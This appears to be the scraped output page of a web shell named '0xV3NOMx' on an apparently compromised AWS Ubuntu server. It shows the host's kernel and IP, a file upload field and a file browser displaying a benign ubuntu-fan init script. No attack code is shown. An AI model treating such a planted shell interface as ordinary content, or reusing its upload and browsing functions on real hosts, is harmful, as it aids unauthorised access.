0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 52.14.204.52


Current Path : /proc/thread-self/root/snap/core/17200/usr/lib/ubuntu-fan/
Upload File :
Current File : //proc/thread-self/root/snap/core/17200/usr/lib/ubuntu-fan/fan-net

#!/bin/sh -

# See how we were called.
case "$1" in
    start)
        : ## fanctl up -a
    ;;

    stop)
        : ## fanctl down -a
    ;;

    restart|reload|force-reload)
        $0 stop
        $0 start
    ;;

    *)
        echo "Usage: $0 {start|stop|restart|reload|force-reload}"
        exit 2
esac

exit $?